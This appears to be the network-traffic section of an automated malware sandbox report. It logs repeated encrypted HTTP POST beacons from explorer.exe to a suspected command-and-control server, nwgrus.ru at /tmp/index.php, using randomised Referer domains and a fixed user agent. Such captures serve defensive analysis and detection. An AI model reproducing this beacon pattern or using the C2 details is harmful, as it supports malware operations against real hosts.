                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.549820119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:32.899426937 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://vbthucuxeraia.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 221
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:32.899456024 CEST221OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3b 0e aa 9c
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu;WUZY`>S`E,G4A5=U$mHGUi}e_y}9`.cq\'QN$~G
                              Oct 12, 2024 20:07:34.426244020 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:34 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.549831119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:34.435060024 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://fhouqknummbbf.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 185
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:34.435089111 CEST185OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 5f 26 a1 f8
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu_&5\YjMQ{^O@\F,W7=U;hmS\")jL]QdWc
                              Oct 12, 2024 20:07:35.946641922 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:35 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.549841119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:35.956039906 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://onlnloemqmkdhio.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 129
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:35.956039906 CEST129OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2b 2a ea 8d
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu+*@o{j}${{ULMeQ
                              Oct 12, 2024 20:07:37.458920956 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:37 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.549849119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:37.467190981 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://xrccmhuqkqkddsnr.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 227
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:37.467225075 CEST227OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 40 09 e7 8e
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu@Y{_J^|wdxq/gR:Yu+O\3t/$?Q*D4D8r*DA"W=q;kDBf
                              Oct 12, 2024 20:07:38.958609104 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:38 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.549861119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:38.966912031 CEST281OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://sgoujgwybxsges.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 141
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:38.967140913 CEST141OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 6e 35 d3 a0
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vun5\h]|ntnn K76|SM`9]
                              Oct 12, 2024 20:07:40.481789112 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:40 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.549870119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:40.490367889 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://jousimacigldf.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 303
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:40.490377903 CEST303OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 25 2e bf 8b
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu%.]vnu+=-i`MaG?SH>*1?JD75|1MMBFoE?(]Kk!qBuXbex;6`
                              Oct 12, 2024 20:07:41.972019911 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:41 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.549881119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:41.982127905 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://sswxpvuufbvykyb.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 140
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:41.982155085 CEST140OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 6c 2f f3 91
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vul/wlXj3bq*[}byLIM"T~
                              Oct 12, 2024 20:07:43.473678112 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:43 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.549892119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:43.483773947 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://cdinohvnolrheurg.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 338
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:43.483793020 CEST338OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 6c 46 bf f6
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vulF)iN~+(E[OwNm9G9IaR\2rO%sdCS@UY?gArM&p:VX!1S5DI>
                              Oct 12, 2024 20:07:44.967206001 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:44 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              11192.168.2.549903119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:44.975231886 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://lifadhlvdwb.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 137
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:44.975404024 CEST137OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 4f 2e c9 a5
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuO.N~LV<ts;3C58
                              Oct 12, 2024 20:07:46.457277060 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:46 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              12192.168.2.549914119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:46.465318918 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://ssfieliemcmj.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 236
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:46.465373039 CEST236OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4c 28 c6 8d
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuL(unMZS:34ne[J7OW/nYDFiG[Q$7|,#o]i[+c}$T"m
                              Oct 12, 2024 20:07:47.959476948 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:47 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              13192.168.2.549925119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:47.967969894 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://oigeugvvgtqexcr.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 210
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:47.968004942 CEST210OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 37 08 aa fc
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu7^$Lx'+aXG4xry@I1/sbLP%KO6/Y2%J:*wy!KTF
                              Oct 12, 2024 20:07:49.466757059 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:49 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
